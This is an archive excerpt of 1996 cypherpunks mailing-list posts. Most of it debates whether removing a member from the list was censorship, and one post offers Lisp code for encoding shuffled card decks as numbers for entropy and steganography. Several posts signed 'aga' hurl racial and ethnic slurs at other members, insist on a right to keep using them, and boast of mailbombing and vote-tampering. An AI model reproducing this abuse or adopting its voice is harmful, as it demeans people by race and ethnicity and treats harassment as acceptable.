> That's why neither of your actions is, in truth, "censorship."
> 
> -Declan

Gilmore's shit would better be called the "EFF's-fucking of the
people," since he thinks he can use his EFF status and past reputation
as a wedge. There is just no excuse for ever pulling any plug, ever.

-john





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 15 Nov 1996 07:40:46 -0800 (PST)
To: nelson@crynwr.com
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.GSO.3.95.961112093119.7009B-100000@well.com>
Message-ID: <328C8847.49F7@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


nelson@crynwr.com wrote:
>  > So you disagree.  Well, the last sentence above says it all - this "list"
>  > that you and 1900+ other people spend so much time on is "just property"
>  > (like a slave), it's censorable (meaning freedom of speech is *specifically
>  > excluded*), and it's terminable without notice (meaning that it's really
>  > just one person's private fantasy, and we'll all bozos on the bus, as it were).

> Yup.  Clearly, then you will wish to start your own mailing list,
> which you will promise is not property, not censorable, and not
> terminable without notice.  Do it!  Don't let us tell you you can't
> (not that anyone is)!  I suspect that you will quickly change your
> opinion of mailing list owners.

I'll bet you're one of those people who tell your kids "Just wait 'till
you grow up - then you'll realize just how smart us parents really are",
etc. etc.  Am I right, Mr. Cliche?  Why do you even bother?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 15 Nov 1996 07:12:59 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: [POLITICS] Re: Members of Parliament Problem
Message-ID: <v02140b01aeb231abd199@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:32 AM 11/15/1996, Adam Shostack wrote:
>         Most of the usual arguments about disallowing anonymity
> actually apply to a Parliment.  There is a responsibility involved in
> the execution of power.

>         This is not to condone attacking children, or killing ones
> political opponents.  For an MP to imply that something he wants to
> say will likely get him/his kids killed probably means that he wants
> to use the power of the state in some way likely to quite upset at
> least a few people.  If this is the case, then allowing him to
> anonymously, and without responsibility, direct the power of the state
> is congruent to tyranny.

Please allow me to respectfully disagree.

Let's consider another issue: recreational drugs.  We can be pretty
sure that a sizeable number of Congressmen use marijuana and see
no reason for it to be illegal.  Yet, to speak about it would be
understood to be political suicide with possible legal repercussions.
Were Congressmen able to speak anonymously, such an issue could be
discussed.  It is more likely that good policy results from discussion.

Or, consider homosexuality.  We can be pretty sure that a significant
number of Congressmen are homosexual.  Yet, to discuss it would be,
for many, political suicide.  Many other Congressmen support
anti-discrimination laws for homosexuals, but are afraid to discuss
it.

Or, consider spending bills.  The Congress is spending our money
for us faster than they can collect it.  Nobody seems to really want
this to be happening, but they can't help it.  Discussion of the
issue may require alienating certain constituents or stating unpleasant
truths which would affect a Congressman's relationship with other
Congressmen.  Speaking anonymously would allow Congressmen to simply
speak the truth without fear of retribution, just like anyone else.

If a small group of people are upset enough to kill somebody for what
they say, I have difficulty immediately describing them as oppressed.
I am making no statement regarding any particular group.

What is more, I believe that political leaders should be subjected to
the same laws as everyone else.  Like many on this list, I do not
believe the citizens have any sort of responsibility to speak
non-anonymously.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 15 Nov 1996 07:16:12 -0800 (PST)
To: Adam Shostack <adam@homeport.org>
Subject: Re: Members of Parliament Problem
Message-ID: <v02140b02aeb235099c35@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:32 AM 11/15/1996, Adam Shostack wrote:
>        To answer the technical end of your question, you could build
> a DC net where joining required a signed key, or build a mix which
> will only accept messages signed by a member of the group.  If the
> mixmasters all agree to only accept messages signed by the group, then
> each mixmaster can be made a member of the group, and sign its
> outbound messages as being recieved with a signature, allowing
> anonymous chaining.

I'll have to research this.  Thank you for the idea.

What I would really like to see is a way in which the "shields" are
not required to participate at all, other than by publishing their
public key.  If terrorists are involved, they may not wish to be on
the suspect list.

I've been toying with schemes that multiply the Ns from everybody's
public key to create a new semi-anonymous public key.  The only
problem is that in each case either identity is revealed or the
person seeking semi-anonymously reveals their secret key.  So,
I am not quite there.  ;-)

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Fri, 15 Nov 1996 04:18:29 -0800 (PST)
To: Sean Roach <roach_s@alph.swosu.edu>
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
In-Reply-To: <199611150046.TAA12925@dhp.com>
Message-ID: <Pine.LNX.3.95.961115071542.2693G-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Nov 1996, Sean Roach wrote:

> Date: Thu, 14 Nov 1996 19:46:08 -0500
> From: Sean Roach <roach_s@alph.swosu.edu>
> To: aga <aga@dhp.com>, cypherpunks@toad.com
> Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News 
> 
> >On Wed, 13 Nov 1996, Mark M. wrote:
> 
> >> Mark
> >> - -- 
> >> finger -l for PGP key
> >> PGP encrypted mail prefered.
> 
> To which, at 08:42 AM 11/14/96 -0500, aga wrote:
> 
> >Why?  Are you a criminal?
> >What are you hiding behind your PGP?
> 
> Okay, I'll bite.  Where is it said that a person who wants h[is,er] privacy
> is a criminal?  Charlie McCarthy might have said that.
> 

It just "looks" that way on the net.  I do live-fucking, newsgroup
flooding, mailbombing, vote-tampering and defamation all legally,
and OPENLY on the InterNet.

The more you PGP, the worse you look.  Nobody reads your e-mail,
so stop being so paranoid.

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 15 Nov 1996 07:22:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Playing Cards
Message-ID: <v02140b03aeb239f7c4bb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


(My apologies to those who are seeing this twice.  I sent it
yesterday but it does not seem to have made it through.)

A number of us have been concerned about how PGP generates entropy.
Striking the keyboard beats using time as a source of random numbers,
but the degree of entropy is not well understood.  Are there machines
where - for some reason - the keyboard strikes fall into some sort
of pattern?

And that's just when you are generating your public/private key pair.
What happens when you are just generating 128-bit keys for individual
messages?  Where is the entropy coming from?  I don't understand
completely, but somehow PGP collects entropy from the system and then
runs it into IDEA and then uses the numbers from the output.  When the
program is not running, a pool of this data is kept in randseed.bin.

We already know it's a problem because it is hard to understand what
it is even doing, much less determine if it is consistent with sound
engineering practice.

This problem is certainly not confined to PGP.  A lot of people have
worked hard to make computers deterministic.  What do you do when you
need entropy?

Yes, you can buy a chip which generates random numbers at nearly any
bandwidth you like.  But, right there you have a problem.  How do you
know the output is really random?  The answer is that you do not.

Playing cards are a nice source of randomness because they are widely
available and their behavior has been under study for a long time by
people with strong financial reasons for finding flaws.  I slightly
prefer cards to dice because dice may be slightly predictable or even
loaded.

It would be nice if cryptography software would allow you to enter
randomly selected playing cards from time to time to increase the
entropy of keys.  Careful people (Black Unicorn?) would enter the
cards prior to sending each message.

A well shuffled deck of 54 cards has about 237 bits of entropy.  This
is easy to use: the program asks the order of the cards, converts this
to a string, and runs it through a one-way hash.  (Entering the cards
is a bit of a nuisance.  Is there an easy way to have them read
automatically?)

The Economist reports that seven riffle shuffles bring a deck "very
close to being random".  ("Science and Technology: How to win at poker
and other science lessons" The Economist, October 12, 1996, pp:88-89.)

Cards have other uses.  You can assign a (large) number to each
configuration of the deck.  This allows you to use a deck of cards to
represent numbers.  That is certainly convenient for generating large
random numbers.  I have included some Lisp code below which converts
both ways between shuffled decks of cards and unique numbers.

This could be quite useful for strong steganography.  Let's say you
have 230 bits you want to deliver across a border.  It is unlikely
that anybody will study a deck of cards very carefully.  Of course,
you need not limit yourself to cards.  Any set of objects which can be
ordered will do the trick.  For instance, a shelf with 100 books may
be used to store 524 bits.  One thousand books may store 8529 bits.
How many bits can you store in that database which is in apparently
random order?

You can hide your data in two decks.  There is a natural order to
cards: pick your favorite ordering of the suits and then do the rest
numerically.  However, if you shuffle one deck of cards and lay them
in a row, you could use that ordering to define the mapping of the
second deck of cards to numbers.  The Enemy may seize one deck or the
other, but without both, the number will not be revealed.  While I
hesitate to use the term, this is a one-time pad.  The first deck can
be thought of as the key and the second deck is the message.

How the Lisp Code Works
-----------------------

Let's use as an example a deck of five cards numbered from 0 to 4.
There are 5! = 120 combinations of these cards.  We can think
of each card as a "digit" in a slightly odd numbering system.

In decimal arithmetic, we have columns whose value increments by 10^0,
10^1, 10^2, etc.  In our numbering system of five cards, columns
increment by 0, 1, 2!, 3!, and 4!.

Consider the card sequence of (4 3 2 1 0).  We wish to compute the
value stored in the leftmost column.  Since there are five choices of
cards, this divides the number of possible combinations into five
pieces of 4! combinations each.  So, in this example, the value in the
first column will be 4*4! = 96.  This leaves us with cards (3 2 1 0).
We can look at this as a smaller number represented by a deck of four
cards.  This smaller number is added later to the larger number to get
the final total number for our original deck.  The first column of our
smaller deck is 3*3! = 18.  The next one is 2*2! = 4, the one after
that is 1*1! = 1, and the last card never matters because there is
only one card to choose (0*0!).  The total is 96 + 18 + 4 + 1 = 119.
This is the highest number we can represent with a deck of five
cards.

Consider the card sequence (0 1 2 3 4).  This is the smallest value we
can represent, 0.  The value of the first column is 0*4! = 0.  This
leaves us with (1 2 3 4).  But what has happened here?  We can't treat
this as a normal smaller deck because it is missing a card.  Besides,
1*1! = 1, which is not the zero we expected.  We must renumber the
cards so that it is a reasonable deck again.  The sequence of cards we
should really be looking at is (0 1 2 3).  This means the value of the
next column should be 0*3!.  Then we renumber the deck and continue
until we run out of cards.  The answer is 0.

For an exercise, what is the value of (4 2 1 3 0)? (Answer at end.)

Now, how do we construct the deck given only the number defining its
combination?  The code below is recursive.  It computes the first
digit and then calls itself to recursively find the remaining cards.
The cards returned are always an internally consistent deck of cards;
that is, if sorted they will be consecutively numbered starting from
0.  When a new card is inserted, the cards have to be renumbered to
accomodate the new one by incrementing every card which has the same
or greater face value as the card being inserted.  (Insertion is
slightly misleading here because you place the card at the head of the
list.  Insertion refers to the conceptual process of inserting the
card into the pre-existing order and adjusting the other values to
allow it.)

In other languages, this might be a little more complicated to
implement.  Lisp provides a nice bignum package and also (I believe) a
compiler which knows how to convert the recursive routines below into
iterative routines.  This code performs quite well even on a small
slow machine.

;;;-*- Mode: Lisp; Package: COMMON-LISP-USER -*-

(defun compute-combination-number (cards)
  "Converts list of numbered cards into a unique number representing
their order."
  (cond ((> (length cards) 1)
         (+ (* (car cards)
               (factorial (1- (length cards))))
            (compute-combination-number (renumber-cards cards))))
        (t 0)))

(defun renumber-cards (cards)
  "Removes lead card from deck, decrements higher numbered cards
by one so there are no gaps."
  (let ((renumbered-cards-reversed)
        (lead-card (car cards)))
    (dolist (card (cdr cards))
      (cond ((> card lead-card)
             (push (1- card) renumbered-cards-reversed))
            (t
             (push card renumbered-cards-reversed))))
    (reverse renumbered-cards-reversed)))

(defun reconstruct-deck (combination-number deck-size)
  "Converts unique number representing order of a deck of cards
and returns a list of numbers representing the deck."
  (cond ((not (<= deck-size 1))
         (multiple-value-bind (digit remaining-combination-number)
                              (floor combination-number
                                     (factorial (1- deck-size)))
           (insert-card digit (reconstruct-deck
                               remaining-combination-number
                               (1- deck-size)))))
        (t (list 0))))

(defun insert-card (new-card card-list)
  "Inserts a card into a deck, increasing by one every card which
is of higher or equal number so there are no duplicate cards."
  (let ((new-deck-reversed))
    (push new-card new-deck-reversed)
    (dolist (card card-list)
      (cond ((>= card new-card)
             (push (1+ card) new-deck-reversed))
            (t
             (push card new-deck-reversed))))
    (reverse new-deck-reversed)))

(defun factorial (number)
  (cond ((or (= number 1) (= number 0)) 1)
        (t (* number (factorial (1- number))))))

;;; Testing routines

(defun shuffle-deck (deck-size)
  (randomize-list (build-card-list deck-size)))

(defun randomize-list (some-list)
  (do ((randomized-list nil))
      ((null some-list) randomized-list)
    (let ((item-number (random (length some-list))))
      (push (elt some-list item-number)
            randomized-list)
      (setf some-list
            (remove (elt some-list item-number) some-list)))))

(defun build-card-list (deck-size)
  "Returns a list of consecutive numbers representing a deck of
cards."
  (do ((card-list nil)
       (count 0 (1+ count)))
      ((= deck-size count) card-list)
    (push count card-list)))

(defun identicalp (list-one list-two)
  "Returns non-nil if the two lists are identical."
  (eval (cons 'and (map 'list #'equal list-one list-two))))

(defun exhaustively-test-card-combinations (deck-size)
  "Verifies that the correct deck is reconstructed from the unique
order number for every combination of a small deck of cards."
  (let ((combinations (factorial deck-size)))
    (do ((combo-number 0 (1+ combo-number)))
        ((= combinations combo-number) t)
      (cond ((not (= (compute-combination-number
                      (reconstruct-deck combo-number deck-size))
                     combo-number))
             (warn "Test failed for ~D" combo-number))))))

(defun test-one-deck (deck-size)
  "Shuffles a deck of cards and verifies that it may be reconstructed
from the unique number representing its order."
  (let* ((original-deck (shuffle-deck deck-size))
         (reconstructed-deck (reconstruct-deck
                              (compute-combination-number original-deck)
                              deck-size)))
    (cond ((not (identicalp original-deck reconstructed-deck))
           (warn "Test failed for ~A" original-deck)))))

(defun test-many-decks (trials max-deck-size)
  "Shuffles trials decks of maximum size max-deck-size and verifies
that their order may be reconstructed from the unique number we compute."
  (do ((trial-number 0 (1+ trial-number)))
      ((= trials trial-number) t)
    (test-one-deck (1+ (random max-deck-size)))))

(defun complete-combination-test ()
  "Good test of all the card combination routines."
  (format t "Performing exhaustive test.~%")
  (exhaustively-test-card-combinations 6)
  (format t "Performing random test on large decks.~%")
  (test-many-decks 10 100))

;; (Exercise Answer: (4 2 1 3 0) = 111)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Fri, 15 Nov 1996 07:40:53 -0800 (PST)
To: Declan McCullagh <declan@well.com>
Subject: Re: Censorship on cypherpunks?, from The Netly News
In-Reply-To: <Pine.GSO.3.95.961114065326.11045D-100000@well.com>
Message-ID: <328C8BEE.4014@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:
> The mere fact that a privately-owned discussion group becomes popular does
> not mean that it becomes a public forum.
> Say I start a poetry mailing list to discuss Blake's writings. I have
> three people on it. One becomes obnoxious and emailbombs the list since he
> disagrees with my interpretation of "A Memorable Fancy." Do I have the
> right to kick him off? How is this different from a private poetry reading
> in my home?

A gentleman whose name I don't have once wrote:  "Freedom (if it is worth
something and to be preserved) is not the freedom to do whatever you want
to do, it is the freedom to do what you ought to do."

One could look at it both ways, of course.

But in all fairness, let's look at a seemingly unrelated example for
perspective:

Say I work in a software shop, and my boss, who has a big monitor and a
really good 1280 x 1024 video card, makes a large document with all kinds
of fonts, including very small ones, which he can see clearly on his
system.  He gives the .DOC to me to review, however, I have a cheap VGA
card and 12-inch monitor, and can't see much of the text clearly.

My boss gets on my case, and rides me because I'm stalling on the review,
since I can't see the text clearly.  I point out that he's not being fair,
but other people at work join his side and tell me that "He's the owner,
he has the right to do whatever he wants, including terminate your job",
and so forth.

(But he's still an asshole, you see).  You do understand that, yes?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 15 Nov 1996 04:53:11 -0800 (PST)
To: Dave Del Torto <ddt@pgp.com>
Subject: Re: One Big Telecoms Company
Message-ID: <3.0b36.32.19961115075321.006e0500@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:02 PM 11/14/96 -0800, Dave Del Torto wrote:
>Um, a _better_ one, now that government monopolies are largely out of the
>way, leaving significant infrastructure for them to use? There's this one
>little company called MCI, see, and there's this _other_ little company
>called BT, and...

There are now 150 Long Distance telephone companies in the US vs 1 when I
was a kid.

There are now 5 or 6 broadcast and 150 cable TV networks in the US vs 3
when I was a kid.

There will soon be 5 cellular and PCS companies in NYC vs 0 when I was a kid.

There are now 6000 ISPs vs 0 when I was a kid.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aga <aga@dhp.com>
Date: Fri, 15 Nov 1996 05:00:58 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: THAT is what makes John Gilmore an ASSHOLE!
In-Reply-To: <199611150619.AAA01605@smoke.suba.com>
Message-ID: <Pine.LNX.3.95.961115073500.2693I-100000@dhp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Nov 1996, snow wrote:

> Date: Fri, 15 Nov 1996 00:19:46 -0600 (CST)
> From: snow <snow@smoke.suba.com>
> Reply-To: freedom-knights@jetcafe.org
> To: Dave Hayes <dave@kachina.jetcafe.org>
> Cc: freedom-knights@jetcafe.org, declan@well.com, cypherpunks@toad.com
> Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
> 
> > [This is a rebuttal to a misguided news article.]
> > > Cypher-Censored
> > > By Declan McCullagh (declan@well.com)
> > Thank you for leaving your email address. It makes this easier.
> > You people (read: the unaware and hypnotized masses, which includes
> > reporters who's desire for attention and political safety holds them
> > in line with the consensual illusion) keep missing the real issue, and
> > substituting issues which only hold themselves in place.
> 
>      So you are explaining your problems in advance. Good, it tells 
> thoughtful readers to take you with a grain of salt.  
> 
> > [Those of you who know, please excuse the mediaistic terms used in
> > this rebuttal. One must use the symbols one is given to communicate
> > at the level of understanding of those who use them.]
> 
>     Ok, I will try to keep from using too long words so you can understand
> me. 
> 
> > In person-to-person interaction, one's only real defense against what
> > one decides to call "unwanted" is to remove oneself from the arena of
> > interaction. It may not be possible to ignore or run away from certain
> > sources of input. 
> 
>      You forget "shutting down" the source of input. Turning off the 
> radio, TV etc, or turning off the person speaking. 
> 

It ain't the person, but the language that Gilmore tried to censor.

> > Logically, we must conclude that those who frequently and repeatedly
> > cry for the censorship or removal of any source of input from
> > cyberspace are either:
> > 
> > 	-quite clueless about the tools at their disposal
> > 	-ideologically or personally opposed to the source of input
> > or	-in need of large amounts of attention from others
> 
>     No problems with that. 
> 
> > >    The list is on Gilmore's machine and he can do what he wants with
> > >    it; he can moderate the postings, he can censor material, he can
> > >    shut the whole thing down. By kicking off an offending user, a
> > >    list owner merely exercises his property right. There's no
> > >    government involvement, so the First Amendment doesn't apply. And
> > >    the deleted, disgruntled user is free to start his own mailing
> > >    list with different rules.
> > 
> > Notice how, once the opposition is admitted to, the rationalization
> > begins. Suddenly this is not a matter of censorship, but of ownership.
> > Just as suddenly, the classic anti-free-speech arguments of "if you
> > don't like it, start yer own" begin to surface. (Anyone ever notice
> > how this resembles the "love it or leave it" mentality of certain
> > American patriotic organizations?)
> 
>      It still isn't censorship. Censorship, at least in my dictionary, 
> refers to censor, which uses the word "Official" several times. Mr. 
> Gilmore is not an "Official" in a government sense, he maybe in the EFF
> sense, but this is not an "Official" EFF organ, so that doesn't count. 
> 
>      He is the OWNER of this list, and the machine it runs on. If he chooses
> (which he didn't) to keep someone from using the list, it is his right.
> 

No it ain't; not after the list gets so big.  Public newsgroups
lose all rights of censorship by the owners, and that is law.

> > What would ideological opposition be without the attempt at analogy? 
> > Here we witness another example:
> > 
> > >        But then the question is whether Gilmore should have exercised
> > >    that right, especially in such an open forum. Again, I think Gilmore's
> > >    actions were justified. Consider inviting someone into your home or
> > >    private club. If your guest is a boor, you might ask him to leave. If
> > >    your guest is an slobbish drunk of a boor, you have a responsibility
> > >    to require him to leave before he ruins the evening of others.
> > 
> > Notice that the net is compared to a home or private club. Actually
> 
>      WRONG. the "net' wasn't compared to either a home or a private club,
> THIS LIST WAS. No one has the right to kick anyone off public streets, the
> police _do_, but I seriously doubt that they could arrest you for refusing.
> Gilmore didn't "Ban" Vulis from "The Net" (in fact he didn't even ban him 
> from the list, he just removed him from the distribution list), he didn't
> even try.
> 
>      He also didn't prevent Vulis from posting, tho' he could have. 
> 
> > the net is neither, however that would not serve the purposes of this
> > analogy, so this fact is convienently forgotton. 
> > The net is a wonderful place. Any ideology, no matter who disagrees or
> > agrees with it, can be expressed and discussed here...assuming those
> > who oppose this ideology do not have their way with the source of
> > expression. There is a more refined and deeper truth to be found
> > in the very existence of the set of all human ideologies, which is
> > just beginning to show itself to some netizens. Unfortunately, this
> > truth can be ruined when people equate some notion of value to 
> > sources which ignore all but a tiny subset of the set of all ideologies:
> 
>      Again I repeat myself:
> 
>     Vulis was not "removed" in any way, shape, or form from "the net", all
> Gilmore did was "Turn his back" on Vulis, saying in effect "Your bullshit
> isn't wanted here". 
> 
>     He didn't tell Vulis to keep his opnion to himself, no one on this list 
> did. He, and others here were asking Vulis to stop his repeated personel 
> attacks on other list members, some were asking him to stop his vitrolic 
> rants on racial and ethnic groups as well, which were _way_ off topic.  
> 

Now THAT is what makes John Gilmore an ASSHOLE!
"personel(sic) attacks on other list members" and "vitriolic rants on
racial and ethnic groups" are normal things for the InterNet, and they
should NEVER be suppressed. I reserve the right to call you a nigger
or a kike any time that I want to, asshole, and you has better get
used to it. What the fuck nationality is Gilmore anyway?  Is he a
wild-jew or crazy irishman or what?  

> > >        Eugene Volokh, a law professor at UCLA, runs a number of mailing
> > >    lists and has kicked people off to maintain better editorial control.
> > >    Volokh says that the most valuable publications are those that
> > >    exercise the highest degree of editorial control.
> 
> > Value to whom and for what? If the editorial control produces one
> > small element of the set of all ideologies, then this is only of value
> > to the people who support this ideology. Given that the set of 
> 
>      You know, from your position I'd say you have a very clear view of 
> your colon. 
> 
>      "Editorial Control" means that someone decides who get's published and
> who doesn't. From your opposition to it, I guess you think that a magazine
> dedicated to poetry should print all poems submitted, or as many, selected
> in some sort of non-judgemental order, as they can fit. Or that a magazine
> should print any writings submitted to it. 
> 
>      I run 4 mailing lists, one is personal, one is in the process of coming
> online, and 2 are up and running. One of these has a rule: No Politics allowed.
> I guess I am a pathetic little censorous worm huh? Nope. That rule was put 
> there for a very good reason, and I am that reason. I love to talk politics,
> but that is the WRONG FORUM for it. 
> 
>     Just like this is the wrong forum for Vulis to spew his shit. 
> 

No it ain't, asshole.

> > people who support an issue is smaller than the set of people
> > who support and oppose an issue, would the value not increase
> > by allowing both sides of an issue equal speaking time? 
> 
>     Yes, and the cypherpunks list DOES THAT. Vulis wasn't kicked off for 
> opposing Crypto, or the spread of Crypto, he was kicked off for littering,
> and for refusing to stop littering. Actually he was kicked off for daring 
> Gilmore to make him stop littering.  
> 

Get used to the shit, asshole.

> > >        For his part, Gilmore calls removing the Russian mathematician "an
> > >    act of leadership." He says: "It said we've all been putting up with
> > >    this guy and it's time to stop. You're not welcome here... It seemed
> > >    to me that a lot of the posts on cypherpunks were missing the mark.
> > >    They seemed to have an idea that their ability to speak through my
> > >    machine was guaranteed by the Constitution."
> > 
> > It is sad to note that this is the leader of one of America's
> > forerunning organizations of freedom who says these words. For all
> > *his* ideology of free speech, this statement reveals the hypocrasy he
> > lives with for all to see. The true litmus test of free speech is to
> > encounter speech that you *want* to censor.
> 
>      Not really, he was simply refusing to let Vulis share his (Gilmore's)
> podium. 
> 

No, he was just trying to control Dr. Vulis's language, and that
sucks.  John Gilmore must be added to the net.scum web-page.

> > Mr. Gilmore, and other like minded parties, might want to consider
> > what would happen if one parent company owned *all* communications
> > media. Would they they be so supportive of the ideology of ownership
> > and communciation they espouse?
> 
>      How would this happen? Setting up a press is fairly easy, at least 
> a small hand operated press. Start your own magazine, start your own
> mailing list. 
> 

Right, but don't ever preclude me calling you a nigger or a kike,
or a chink or a spic or a wap, etc., motherfucker.

>      That is what freedom is, the ability to _do it yourself_ not the 
> requirement that others do it for you, or allow you to use what they 
> have already built. 
> 
> Petro, Christopher C.
> petro@suba.com <prefered for any non-list stuff>
> snow@smoke.suba.com
> 

This whole thing boils down to John Gilmore not liking
"rants" or "personal attacks."  What does that chicken-shit
punk hide behind in real life?  When his terminal is not
protecting him?  John Gilmore is connected with the corrupt
cabal boys anyway, so he should be dismissed as anybody having
any credibility any more.

"Once you pull the first plug, you are forever more a whore,"
as the greeks would say.

-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at CCI (1.8b)" <LISTSERV@MAIL.COMPCURR.COM>
Date: Fri, 15 Nov 1996 07:09:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Command confirmation request (057CCA)
Message-ID: <199611151609.IAA16003@mail.compcurr.com>
MIME-Version: 1.0
Content-Type: text/plain


Your command:

                           SIGNOFF NEWSLETTER

has been received. For security reasons, you are now required to reply to
this  message, as  explained  below,  to confirm  the  execution of  your
command. If  you have problems with  this procedure, you can  contact the
list owner directly (NEWSLETTER-request@MAIL.COMPCURR.COM)  and ask to be
manually removed from the list.

To confirm  the execution of  your command,  simply reply to  the present
message and type  "ok" (without the quotes) as the  text of your message.
Just the word "ok" - do not  retype the command. This procedure will work
with any mail  program that fully conforms to the  Internet standards for
electronic  mail. If  you receive  an error  message, try  sending a  new
message to LISTSERV@MAIL.COMPCURR.COM (without using the "reply" function
-  this is  very important)  and type  "ok 057CCA"  as the  text of  your
message.

Finally,  your command  will be  cancelled  automatically if  you do  not
confirm it  within 48h. After that  time, you must start  over and resend
the command to get  a new confirmation code. If you  change your mind and
decide that  you do NOT want  to confirm the command,  simply discard the
present message and let the command expire on its own.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Fri, 15 Nov 1996 00:39:20 -0800 (PST)
To: snow <hyperlex@hol.gr (George A. Stathis)
Subject: Re: [REBUTTAL] Censorship on cypherpunks?, from The Netly News
Message-ID: <199611151030.IAA25710@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


At 07:22 ìì 14/11/1996 -0600, snow wrote:
>    Intelligence + money + time * will = Result
>        Some     +  0    + a bit * some = A server with 4 or 5 mailing lists. 

Indeed!  But I tend to use them for A.I. Research, and there is little
left of 'em for them mailing listes ya knaw! :-) :-)


>     For every "tentacle" of the Vast Media Conglomerates, there is 
>some loose nut with a photocopier (or access to Kinko's). 

Thank Goddess! :-)


>> Even your American President is in reality a puppet of the Trilateral
>> Commission, who effectively also control CNN, the Washington Post,
>> and many many many other things all over the world.
>
>     WHO is nuts? 

The American and European public, i.e. _we_ who trust those people! :-)



>> P.S. Even if you offered me a million dollars I'd stay away from
>>      your country. My sanity is much more valuable.  :-)
>>      (The Immigration Authorities in the U.S. have missed the point:
>>       We DON'T want to come to you guys. It's the last thing we'd want!)
>
>     One of these days reality is going to hit you like a runaway 
>freight train. 


You mean my check for $ 1.000.000 is... coming? :-)

Cheers
George

P.S.  The reasons I'd decline the check are simply the difficulties in
      having to (1) hide from your authorities as an 'illegal immigrant',
      (2) having to work for someone else as opposed to myself (as I do
      over here) andf (3) having to hire a psychiatrist sooner or later!

All this maan, is more costly than $ 1.000.000.

And... yes, I _am_ nutts! (Aren't we all? ;-) )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 15 Nov 1996 05:34:40 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Well-regulated
Message-ID: <1.5.4.32.19961115133235.00669638@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:

>>Cypherpunks does not seem to me to be anything like the well-
>>regulated lists you ascribe to Prof Volokh.
>>
>
>Declan should rest his point here. the cpunk list is notorious
>for being way astray. yet cpunks continuously argue against
>anyone with a moderator type role. could there be some correlation
>between lack of moderation/leadership on the list and the 
>piles of noise that people incessantly complain about? of 
>course I'm insane for suggesting this.


Vlad,


"Well-regulated" means different things to different mind-sets.

As do "leadership," "moderator" and "anarchy."

All can be fulfilled in diametrically opposite ways: benevolent
suppression of assent to attain uninspired unanimity or pissed 
respect for your opponents skill at insulting you and your ideas,
sexual preferences, hair style, even, ahem, code and writing 
abilities.

What you call "way astray" about cypherpunks I would call
"healthy waywardness of stray cats."

I say, let the wild cats grow and wail backalley of the spiffy facades 
and green lawns; let them disturb sly cultivators of the currently 
fashionable, marketable career-boosting management of the
Internet herd.

That's my critique of the 1st Amend mongers (spit): too narrow-
minded about freedom of speech, they always give themselves
away by fanaticism about proper grammar and spelling and
behavior, well, you know, demanding polymorphous heathens 
do it like missionaries who think tongues are only for talking.

Heed the complicity of God and Mammon, one person's butthole 
is another person's way to heaven on earth. As missionaries admit
about the joys of exotic lands and stray cat codes and wailing
discourse.

The Occident is a prig, and overly addicted to a tight-laced 
definitions of propriety, heirarchy and rank. That's "well-regulated"
at its worst and meanest and murderous and censorious.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 15 Nov 1996 08:26:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Get back on your medications....
In-Reply-To: <v03007800aeb10c74f181@[207.167.93.63]>
Message-ID: <RcTFXD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> (I also find his threats applied inconsistently, as when he advises one of
> his opponents that making a mention of "medications" may be "actionable,"
> while ignoring the many, many comments by me, Sandy, and others of our ilk
> about people needing to get back on their lithium or thorazine. And, by the
> way, it's _not_ actionable to make such jibes, at least not yet.)

Of course anything is actionable. Access to courts is a basic right.
Somebody flames by Timmy May and accused of being a Ritaline junkie (or
whatever) may file a defamation of character lawsuit. It would probably
be junked, but he can file.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Fri, 15 Nov 1996 00:48:48 -0800 (PST)
To: dave@kachina.jetcafe.org (Dave Hayes)
